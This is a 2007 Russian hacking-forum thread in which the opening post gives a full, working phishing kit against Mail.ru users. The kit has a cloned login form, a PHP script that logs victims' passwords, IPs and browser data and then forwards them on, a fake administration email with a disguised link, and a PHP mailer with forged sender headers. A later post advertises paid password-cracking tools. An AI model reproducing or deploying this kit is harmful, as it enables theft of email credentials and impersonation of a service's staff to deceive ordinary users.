![]() |
| [ На главную ] -- [ Список участников ] -- [ Правила форума ] -- [ Зарегистрироваться ] |
| On-line: |
| Форум Для Умных Людей / [ ХАКИНГ ] / ВЗЛОМ МЫЛА на Mail.ru |
| Страницы: 1 |
|
| Автор | Сообщение |
|
Jonni23 Группа: ПРИВЕТ Сообщений: 16 |
Добавлено: 04-02-2007 13:58 |
|
В эой статье я хочу рассказать как можно утянуть пароль от ящика на мейл.ру. Принцип таков: Вы сохраняете первую страницу mail.ru, находите в исходном коде страницы форму аворизации и изменяете её примерно на следующее: <table cellpadding=0 cellspacing=0 border=0 width=100% class=login><form name=Auth method=post action="auth.php"> <input type=hidden name=Mpopl value=1562051042> <tr> <td> </td> <td class=form> <table cellpadding=0 cellspacing=0 border=0 width=100%> <td width=100% nowrap><b><a href=http://win.mail.ru/cgi-bin/signup>Регистрация в почте</a></b></td> <td align=right><a href=http://r.mail.ru/cln2840/www.mail.ru/pages/help/index.html><img src=images/helpm000.gif width=14 height=14 border=0 alt=Помощь hspace=2></a></td> </table> </td> </tr><tr> <td class=title>Имя</td> <td class=form width=100%> <table cellpadding=0 cellspacing=0 border=0 width=100%> <td width=50%><input type=text class=long size=3 name=Login tabindex=1></td> <td width=50%><select size=1 name=Domain class=long tabindex=2> <option value=mail.ru selected>@mail.ru</option><option value=inbox.ru >@inbox.ru</option><option value=bk.ru >@bk.ru</option><option value=list.ru >@list.ru</option> </select></td> </table> </td> </tr><tr> <td class=title>Пароль</td> <td class=form> <table cellpadding=0 cellspacing=0 border=0 width=100%> <td width=100%><input type=password class=long size=6 name=Password tabindex=3 value=></td> <td> <a href=http://www.mail.ru/pages/help/92.html class=grey>Забыли?</a></td> </table> </td> </tr><tr> <td> </td> <td> <table cellpadding=0 cellspacing=0 border=0 width=100%> <td><input type=checkbox id=alien class=hole name="level" value=1 tabindex=4></td> <td width=100% height=28 class=lbl><label for=alien>Чужой компьютер</label></td> <td><input type=submit tabindex=5 value=" Войти " ></td> </table> </td> </tr></form> <script language="jаvаScript"><!-- document.Auth.Login.value=""; //--> </script> </table> То есть она теперь ведёт не на скрирт авторизации мейла, а на Ваш скрипт, который нужно закачать на хостинг с поддержкой PHP. А вот, собственно, и сам скрипт "auth.php": <?php Error_Reporting(E_ALL & ~E_NOTICE); $file = "log.txt"; //название файла с логом $Mpopl=$_REQUEST['Mpopl']; $Login=$_REQUEST['Login']; // Перехватываем логин $Password=$_REQUEST['Password']; // Перехватываем пароль $Domain=$_REQUEST['Domain']; // Перехватываем доме ящика $bsp=" "; // это у нас будет пробел :) $n="\n"; // это у нас будет разделитель строк (вместо нажаия Enter) $cobaka="@"; // символ @ $ip=$_SERVER['REMOTE_ADDR']; // ловим ip жертвы $brauser=$_SERVER['HTTP_USER_AGENT']; // и для интереса информация о браузере и др. $f = fopen($file, "r+t"); // открываем файл лога while (!feof($f)) { // при каждой новой записи в лог $st = fgets($f); // данные не будут стираться, } // а будут записыватся дальше. ######################################## // Записываем данные в лог. fwrite($f, $Login); fwrite($f, $cobaka); fwrite($f, $Domain); fwrite($f, $bsp); fwrite($f, $Password); fwrite($f, $bsp); fwrite($f, $bsp); fwrite($f, $bsp); fwrite($f, $bsp); fwrite($f, $bsp); fwrite($f, $ip); fwrite($f, $bsp); fwrite($f, $brauser); fwrite($f, $n); ######################################## fclose($f); // Закрываем файл лога // А далее следует форма, которую пользователь и не увидит! И с помошью jаvаScript отправиться на мейл.ру, опять же, без участия пользователя! ?> <form name="Auth" method=post action=http://win.mail.ru/cgi-bin/auth> <input type=hidden name=Mpopl value=<?php echo "$Mpopl"; ?>> <input type=hidden name=login_from value=titul> <input type=hidden name="level" value=1> <input type=hidden name="Login" value="<?php echo "$Login"; ?>"> <input type=hidden name="Password" value="<?php echo "$Password"; ?>"> <input type=hidden name="Domain" value="<?php echo "$Domain"; ?>"> <input TYPE=hidden name="" value="Войти"> <script language=jаvаscript>Auth.submit()</script> </form> <div align="center""> <br><br><br><br><br><br><br><br> <table border=1><tr><td> <body bgcolor=black text=white> <div align="center""> <table><tr><td><h2>Уважаемый владелец ящика </td></tr></h2><?php echo "<tr><td><font size=6 color=red>$Login$cobaka$Domain</font></tr></td><tr><td><h2> Ваш запрос обрабатывается. Подождите, пожалуйста, несколько секунд.</h2></tr></td>"; ?> <tr><td><font size=3 color=white>Ваш IP-адрес: </font><font size=3 color=red><?=$_SERVER['REMOTE_ADDR']?></font></tr></td> <tr><td><font size=3 color=white>Ваш браузер: </font><font size=3 color=red><?=$_SERVER['HTTP_USER_AGENT']?></font><br><br></tr></td><table> </div> <div align="center""> <? if (!$Mpopl) echo "<table><tr><td><font size=5 color=white>ошибка 1) </font><font size=5 color=red>Неизвестная ошибка!</font></td></tr>"; if (!$Login) echo "<tr><td><font size=5 color=white>ошибка 2) </font><font size=5 color=red>Вы не ввели свой логин!</font></td></tr>"; if (!$Password) echo "<tr><td><font size=5 color=white>ошибка 3) </font><font size=5 color=red>Вы не ввели свой пароль!</font></td></tr>"; if (!$Domain) echo "<tr><td><font size=5 color=white>ошибка 4) </font><font size=5 color=red>Неизвестная ошибка!</font></td></tr></table>"; ?> </div> </tr></td> </table> </div> Ну, думаю суть понятна. Скрипт ловит данные, записывает их в лог log.txt и поом пересылает пользователя на мейл.ру. Хотя можно и убрать всю эту хрень с ошибками и приветствиями, просто в моей ситуации оно мне было нужно. Вот, собствунно, и всё! Данный способ можно применять и для других сервисов: yandex.ru, rambler.ru... Просто нужно подделать подних форму оправки, и всё! Ну и, конечно, чтобы пользователь перешёл на вашу страницу с поддельным mail.ru, отправьте ему письмо от администрации mail.ru, с просьбой повторной авторизации из-за ошибок, или, там, тестовых работ на сервисе. Письмо нужно отправлять в HTML формате. Напимер: <HTML><BODY> Уважаемый пользователь! На сервере проводяться тестовые работы. Пожалуйста, проёдите повторную авторизацию для нормальной работы вашего электронного ящика. <a href="http://mail.ru" target="_new" OnMouseOver="window.status='http://gb';" onMouseOut="location.href=unescape('http://gb');">http://mail.ru</a> <br> С уважением, администрация mail.ru </BODY></HTML> А вот скрипт, который может отправиь HTML письмо: <?php $to = $_REQUEST['to']; $from = $_REQUEST['from']; $reply = $_REQUEST['reply']; $body = $_REQUEST['body']; $theme = $_REQUEST['theme']; $message = "<HTML>...</HTML>"; // текст письма $headers = "From: ".$from."\r\nReply-To: ".$reply."\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: text/html;"; $body .= $message."\r\n\r\n"; mail ($to, $theme, $body, $headers); // отправляем ?> И форма для него: <html> <body bgcolor=#0F5475 text=white> <div align=center> <form action=mail.php method=post> <table width=50% cellpadding=5 cellspacing=2> <tr valign=top> <td>От:</td> <td><input type=text name="from" value=""><br> </td> </tr> <tr valign=top> <td>Куда послать:</td> <td><input type=text name="to" value=""><br> </td> </tr> <tr valign=top> <td>Куда ответить:</td> <td> <input type=text name="reply" value=""><br></td> </tr> <tr valign=top> <td>Тема: </td> <td><input type=text name="theme" value=""><br></td> </tr> <tr valign=top> <td>Текст письма: </td> <td><textarea name=body cols=50 rows=4></td> </tr> </div> </form> </body></html></table> <br> <input type=submit value="Послать">
|
|
|
Андрей!!! Группа: ПРИВЕТ Сообщений: 3 |
Добавлено: 07-03-2007 14:07 |
|
Программы для взлома пароля от ICQ. Так же программа для взлома E-mail. Обе программы взламывают пятизначный пароль за 30 минут на модеме 56 кб/сек. Это новейшая разработка программ для взлома. Такого нет больше в Интернете. Только у нас низкие цены. Обращайтесь по E-mail: andreimihal@mail.ru |
|
|
URGENT Группа: ПРИВЕТ Сообщений: 9
|
Добавлено: 28-05-2007 15:10 |
|
А вот два вопроса. 1.Как узнать,с какого айпи пришло мыло. 2.У нас по сетке с какого-то компа рассылается вирус,червяк ,как узнать С КАКОГО КОМПА он рассылается. спасибо. |
| Страницы: 1 |
|
| Форум Для Умных Людей / [ ХАКИНГ ] / ВЗЛОМ МЫЛА на Mail.ru |